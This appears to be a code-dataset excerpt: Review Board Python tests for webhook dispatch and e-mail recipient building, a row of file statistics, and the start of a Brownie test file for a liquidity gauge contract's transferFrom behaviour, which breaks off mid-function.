spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'submitted')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_request_closed_submitted_local_site(self):
"""Testing webhook dispatch from 'review_request_closed' signal with
submitted for a local site
"""
local_site = LocalSite.objects.create(name='test-site')
local_site.users.add(User.objects.get(username='doc'))
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL,
local_site=local_site)
review_request = self.create_review_request(local_site=local_site,
publish=True)
review_request.close(review_request.SUBMITTED)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'submitted')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_request_closed_discarded(self):
"""Testing webhook dispatch from 'review_request_closed' signal
with discarded
"""
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review_request.close(review_request.DISCARDED)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'discarded')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_request_closed_discarded_local_site(self):
"""Testing webhook dispatch from 'review_request_closed' signal with
discarded for a local site
"""
local_site = LocalSite.objects.create(name='test-site')
local_site.users.add(User.objects.get(username='doc'))
target = WebHookTarget.objects.create(events='review_request_closed',
url=self.ENDPOINT_URL,
local_site=local_site)
review_request = self.create_review_request(local_site=local_site,
publish=True)
review_request.close(review_request.DISCARDED)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_closed')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_closed')
self.assertEqual(payload['closed_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['close_type'], 'discarded')
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_request_published(self):
"""Testing webhook dispatch from 'review_request_published' signal"""
target = WebHookTarget.objects.create(
events='review_request_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_published')
self.assertIn('is_new', payload)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_request_published_local_site(self):
"""Testing webhook dispatch from 'review_request_published' signal for
a local site
"""
local_site = LocalSite.objects.create(name='test-site')
local_site.users.add(User.objects.get(username='doc'))
target = WebHookTarget.objects.create(
events='review_request_published', url=self.ENDPOINT_URL,
local_site=local_site)
review_request = self.create_review_request(local_site=local_site)
review_request.publish(review_request.submitter)
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_published')
self.assertIn('is_new', payload)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_request_reopened(self):
"""Testing webhook dispatch from 'review_request_reopened' signal"""
target = WebHookTarget.objects.create(
events='review_request_reopened',
url=self.ENDPOINT_URL)
review_request = self.create_review_request(publish=True)
review_request.close(review_request.SUBMITTED)
review_request.reopen()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_reopened')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_reopened')
self.assertEqual(payload['reopened_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_request_reopened_local_site(self):
"""Testing webhook dispatch from 'review_request_reopened' signal
for a local site
"""
local_site = LocalSite.objects.create(name='test-site')
local_site.users.add(User.objects.get(username='doc'))
target = WebHookTarget.objects.create(events='review_request_reopened',
url=self.ENDPOINT_URL,
local_site=local_site)
review_request = self.create_review_request(local_site=local_site,
publish=True)
review_request.close(review_request.SUBMITTED)
review_request.reopen()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_request_reopened')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_request_reopened')
self.assertEqual(payload['reopened_by']['id'],
review_request.submitter.pk)
self.assertEqual(payload['review_request']['id'],
review_request.display_id)
def test_review_published(self):
"""Testing webhook dispatch from 'review_published' signal"""
target = WebHookTarget.objects.create(events='review_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review = self.create_review(review_request)
review.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_published')
self.assertEqual(payload['review']['id'], review.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
self.assertIn('general_comments', payload)
def test_review_published_local_site(self):
"""Testing webhook dispatch from 'review_published' signal for a local
site
"""
local_site = LocalSite.objects.create(name='test-site')
local_site.users.add(User.objects.get(username='doc'))
target = WebHookTarget.objects.create(events='review_published',
url=self.ENDPOINT_URL,
local_site=local_site)
review_request = self.create_review_request(local_site=local_site,
publish=True)
review = self.create_review(review_request)
review.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'review_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'review_published')
self.assertEqual(payload['review']['id'], review.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
def test_reply_published(self):
"""Testing webhook dispatch from 'reply_published' signal"""
target = WebHookTarget.objects.create(events='reply_published',
url=self.ENDPOINT_URL)
review_request = self.create_review_request()
review = self.create_review(review_request)
reply = self.create_reply(review)
reply.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'reply_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'reply_published')
self.assertEqual(payload['reply']['id'], reply.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
self.assertIn('general_comments', payload)
# Test for bug 3999
self.assertEqual(payload['reply']['links']['diff_comments']['href'],
'http://example.com/api/review-requests/1/reviews/1/'
'replies/2/diff-comments/')
def test_reply_published_local_site(self):
"""Testing webhook dispatch from 'reply_published' signal for a local
site
"""
local_site = LocalSite.objects.create(name='test-site')
local_site.users.add(User.objects.get(username='doc'))
target = WebHookTarget.objects.create(events='reply_published',
url=self.ENDPOINT_URL,
local_site=local_site)
review_request = self.create_review_request(local_site=local_site,
publish=True)
review = self.create_review(review_request)
reply = self.create_reply(review)
reply.publish()
spy = dispatch_webhook_event.spy
self.assertTrue(spy.called)
self.assertEqual(len(spy.calls), 1)
last_call = spy.last_call
self.assertEqual(last_call.args[1], [target])
self.assertEqual(last_call.args[2], 'reply_published')
payload = last_call.args[3]
self.assertEqual(payload['event'], 'reply_published')
self.assertEqual(payload['reply']['id'], reply.pk)
self.assertIn('diff_comments', payload)
self.assertIn('screenshot_comments', payload)
self.assertIn('file_attachment_comments', payload)
class EmailUtilsTests(TestCase):
"""Testing e-mail utilities that do not send e-mails."""
def test_recipients_to_addresses_with_string_address(self):
"""Testing generating addresses from recipients with string recipients
"""
with self.assertRaises(AssertionError):
recipients_to_addresses(['foo@example.com'])
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_users(self):
"""Testing generating addresses from recipients with user recipients
"""
users = list(User.objects.filter(username__in=['doc', 'grumpy']))
addresses = recipients_to_addresses(users)
self.assertEqual(len(addresses), 2)
expected_addresses = set(
get_email_address_for_user(u)
for u in users
)
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_single_mailinglist(self):
"""Testing generating addresses from recipients that are groups with a
single mailing list address
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2@example.com'),
]
addresses = recipients_to_addresses(groups)
self.assertEqual(len(addresses), 2)
expected_addresses = set(sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[]))
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_many_mailinglist(self):
"""Testing generating addresses from recipients that are groups with
multiple mailing list addresses
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1a@example.com,group1b@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2a@example.com,group2b@example.com'),
]
addresses = recipients_to_addresses(groups)
self.assertEqual(len(addresses), 4)
expected_addresses = set(sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[]))
self.assertEqual(addresses, expected_addresses)
@add_fixtures(['test_users'])
def test_recipients_to_addresses_with_groups_and_users(self):
"""Testing generating addresses from recipients that are users and
groups with mailing list addresses
"""
groups = [
Group(name='group1', display_name='Group One',
mailing_list='group1@example.com'),
Group(name='group2', display_name='Group Two',
mailing_list='group2@example.com'),
]
users = list(User.objects.filter(username__in=['doc', 'grumpy']).all())
addresses = recipients_to_addresses(groups + users)
self.assertEqual(len(addresses), 4)
user_addresses = [
get_email_address_for_user(u)
for u in users
]
group_addresses = sum(
(
get_email_addresses_for_group(group)
for group in groups
),
[])
self.assertEqual(addresses,
set(user_addresses + group_addresses))
def test_recipients_to_addresses_with_groups_with_members(self):
"""Testing generating addresses from recipients that are groups with
no mailing list addresses
"""
group1 = Group.objects.create(name='group1')
group2 = Group.objects.create(name='group2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
expected_addresses = set([
get_email_address_for_user(user1),
get_email_address_for_user(user2),
])
self.assertEqual(addresses, expected_addresses)
def test_recipients_to_addresses_with_groups_local_site(self):
"""Testing generating addresses from recipients that are groups in
local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
group1 = Group.objects.create(name='group1', local_site=local_site1)
group2 = Group.objects.create(name='group2', local_site=local_site2)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
def test_recipients_to_addresses_with_groups_inactive_members(self):
"""Testing generating addresses form recipients that are groups with
inactive members
"""
group1 = self.create_review_group('group1')
group2 = self.create_review_group('group2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
def test_recipients_to_addresses_groups_local_site_inactive_members(self):
"""Testing generating addresses from recipients that are groups in
local sites that have inactive members
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
group1 = self.create_review_group('group1', local_site=local_site1)
group2 = self.create_review_group('group2', local_site=local_site2)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
local_site1.users = [user1]
local_site2.users = [user2]
group1.users = [user1]
group2.users = [user2]
addresses = recipients_to_addresses([group1, group2])
self.assertEqual(len(addresses), 1)
self.assertEqual(addresses, set([get_email_address_for_user(user1)]))
@add_fixtures(['test_users'])
def test_build_recipients_user_receive_email(self):
"""Testing building recipients for a review request where the user
wants to receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_email(self):
"""Testing building recipients for a review request where the user
does not want to receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_email = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_user_not_receive_own_email(self):
"""Testing building recipients for a review request where the user
does not want to receive e-mail about their updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_not_receive_own_email(self):
"""Testing building recipieints for a review request where the
submitter is a reviewer and doesn't want to receive e-mail about their
updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [submitter]
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipient_user_not_receive_own_email(self):
"""Testing building recipients for a review request where the
submitter is a reviewer and doesn't want to receive e-mail about their
updates
"""
review_request = self.create_review_request()
submitter = review_request.submitter
profile = submitter.get_profile()
profile.should_send_own_updates = False
profile.save()
to, cc = build_recipients(submitter, review_request, [submitter])
self.assertEqual(len(to), 0)
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people_and_groups(self):
"""Testing building recipients for a review request where there are
target users and groups
"""
group = self.create_review_group()
user = User.objects.get(username='grumpy')
review_request = self.create_review_request()
review_request.target_people = [user]
review_request.target_groups = [group]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user]))
self.assertEqual(cc, set([submitter, group]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive_and_groups(self):
"""Testing building recipients for a review request where there are
target groups and inactive target users
"""
group = self.create_review_group()
user = User.objects.create(username='user', first_name='User',
last_name='Foo', is_active=False)
review_request = self.create_review_request()
review_request.target_people = [user]
review_request.target_groups = [group]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, group]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_groups(self):
"""Testing build recipients for a review request where there are target
groups
"""
group1 = self.create_review_group('group1')
group2 = self.create_review_group('group2')
review_request = self.create_review_request()
review_request.target_groups = [group1, group2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(len(to), 3)
self.assertEqual(to, set([submitter, group1, group2]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_target_people(self):
"""Testing building recipients for a review request with target people
"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
review_request.target_people = [grumpy]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([grumpy]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_inactive(self):
"""Testing building recipients for a review request with target people
who are inactive
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request.target_people = [user1, user2]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_no_email(self):
"""Testing building recipients for a review request with target people
who don't receive e-mail
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
Profile.objects.create(user=user2, should_send_email=False)
review_request.target_people = [user1, user2]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site(self):
"""Testing building recipients for a review request where the target
people are in local sites
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site.users = [user1]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_inactive(self):
"""Testing building recipients for a review request where the target
people are in local sites and are inactive
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
local_site.users = [user1, user2]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_target_people_local_site_no_email(self):
"""Testing building recipients for a review request where the target
people are in local sites don't receieve e-mail
"""
local_site = LocalSite.objects.create(name=self.local_site_name)
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
Profile.objects.create(user=user2,
should_send_email=False)
local_site.users = [user1, user2]
review_request = self.create_review_request(with_local_site=True)
review_request.target_people = [user1, user2]
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([user1]))
self.assertEqual(cc, set([submitter]))
@add_fixtures(['test_users'])
def test_build_recipients_limit_to(self):
"""Testing building recipients with a limited recipients list"""
dopey = User.objects.get(username='dopey')
grumpy = User.objects.get(username='grumpy')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [dopey]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[grumpy])
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_inactive(self):
"""Testing building recipients with a limited recipients list that
contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_limit_to_local_site(self):
"""Testing building recipients with a limited recipients list that
contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
limit_recipients_to=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients(self):
"""Testing building recipients with an extra recipients list"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
to, cc = build_recipients(submitter, review_request,
extra_recipients=[grumpy])
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_inactive(self):
"""Testing building recipients with an extra recipients list that
contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
review_request = self.create_review_request()
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_local_site(self):
"""Testing building recipients with an extra recipients list that
contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1, user2])
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to(self):
"""Testing building recipients with an extra recipients list and
a limited recipients list
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter, user2]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_inactive(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains inactive users
"""
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
group = self.create_review_group()
review_request = self.create_review_request()
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_extra_recipients_and_limit_to_local_site(self):
"""Testing building recipients with an extra recipients list and a
limited recipients list that contains users in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
user3 = User.objects.create(username='user3', first_name='User',
last_name='Three')
local_site1.users = [user1, user3]
local_site2.users = [user2]
group = self.create_review_group()
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
review_request.target_people = [user3]
review_request.target_groups = [group]
to, cc = build_recipients(submitter, review_request,
extra_recipients=[user1],
limit_recipients_to=[user2])
self.assertEqual(to, set([submitter]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred(self):
"""Testing building recipients where the review request has been
starred by a user
"""
review_request = self.create_review_request()
submitter = review_request.submitter
grumpy = User.objects.get(username='grumpy')
profile = grumpy.get_profile()
profile.starred_review_requests = [review_request]
profile.save()
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, grumpy]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_inactive(self):
"""Testing building recipients where the review request has been
starred by users that may be inactive
"""
review_request = self.create_review_request()
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two', is_active=False)
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
@add_fixtures(['test_users'])
def test_build_recipients_starred_local_site(self):
"""Testing building recipients where the review request has been
starred by users that are in local sites
"""
local_site1 = LocalSite.objects.create(name='local-site1')
local_site2 = LocalSite.objects.create(name='local-site2')
review_request = self.create_review_request(local_site=local_site1)
submitter = review_request.submitter
user1 = User.objects.create(username='user1', first_name='User',
last_name='One')
user2 = User.objects.create(username='user2', first_name='User',
last_name='Two')
local_site1.users = [user1]
local_site2.users = [user2]
profile1 = Profile.objects.create(user=user1)
profile1.starred_review_requests = [review_request]
profile2 = Profile.objects.create(user=user2)
profile2.starred_review_requests = [review_request]
to, cc = build_recipients(submitter, review_request)
self.assertEqual(to, set([submitter, user1]))
self.assertEqual(len(cc), 0)
| 39.804715
| 79
| 0.614754
| 12,167
| 113,125
| 5.481795
| 0.043643
| 0.114218
| 0.027827
| 0.027587
| 0.86764
| 0.841912
| 0.816349
| 0.79101
| 0.763258
| 0.740318
| 0
| 0.008373
| 0.287328
| 113,125
| 2,841
| 80
| 39.818726
| 0.818918
| 0.087116
| 0
| 0.714286
| 0
| 0.00051
| 0.080575
| 0.019863
| 0
| 0
| 0
| 0
| 0.209694
| 1
| 0.063265
| false
| 0.001531
| 0.011224
| 0.00051
| 0.083673
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbf30ae375cc2df789f5c44b5f46f5b7107c68f5
| 6,772
|
py
|
Python
|
tests/unitary/LiquidityGaugeV2/test_transferFrom.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 217
|
2020-06-24T14:01:21.000Z
|
2022-03-29T08:35:24.000Z
|
tests/unitary/LiquidityGaugeV2/test_transferFrom.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 25
|
2020-06-24T09:39:02.000Z
|
2022-03-22T17:03:00.000Z
|
tests/unitary/LiquidityGaugeV2/test_transferFrom.py
|
AqualisDAO/curve-dao-contracts
|
beec73a068da8ed01c0f710939dc5adb776d565b
|
[
"MIT"
] | 110
|
2020-07-10T22:45:49.000Z
|
2022-03-29T02:51:08.000Z
|
#!/usr/bin/python3
import brownie
import pytest
@pytest.fixture(scope="module", autouse=True)
def setup(accounts, gauge_controller, minter, gauge_v2, token, mock_lp_token):
token.set_minter(minter, {"from": accounts[0]})
gauge_controller.add_type(b"Liquidity", 10 ** 10, {"from": accounts[0]})
gauge_controller.add_gauge(gauge_v2, 0, 0, {"from": accounts[0]})
mock_lp_token.approve(gauge_v2, 2 ** 256 - 1, {"from": accounts[0]})
gauge_v2.deposit(10 ** 18, {"from": accounts[0]})
def test_sender_balance_decreases(accounts, gauge_v2):
sender_balance = gauge_v2.balanceOf(accounts[0])
amount = sender_balance // 4
gauge_v2.approve(accounts[1], amount, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], amount, {"from": accounts[1]})
assert gauge_v2.balanceOf(accounts[0]) == sender_balance - amount
def test_receiver_balance_increases(accounts, gauge_v2):
receiver_balance = gauge_v2.balanceOf(accounts[2])
amount = gauge_v2.balanceOf(accounts[0]) // 4
gauge_v2.approve(accounts[1], amount, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], amount, {"from": accounts[1]})
assert gauge_v2.balanceOf(accounts[2]) == receiver_balance + amount
def test_caller_balance_not_affected(accounts, gauge_v2):
caller_balance = gauge_v2.balanceOf(accounts[1])
amount = gauge_v2.balanceOf(accounts[0])
gauge_v2.approve(accounts[1], amount, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], amount, {"from": accounts[1]})
assert gauge_v2.balanceOf(accounts[1]) == caller_balance
def test_caller_approval_affected(accounts, gauge_v2):
approval_amount = gauge_v2.balanceOf(accounts[0])
transfer_amount = approval_amount // 4
gauge_v2.approve(accounts[1], approval_amount, {"from": accounts[0]})
gauge_v2.transferFrom(accounts[0], accounts[2], transfer_amount, {"from": accounts[1]})
assert gauge_v2.allowance(accounts[0], accounts[1]) == approval_amount - transfer_amount
def test_receiver_approval_not_affected(accounts, gauge_v2):
approval_amount = gauge_v2.balanceOf(accounts[0])
transfer_amount = approval_amount // 4
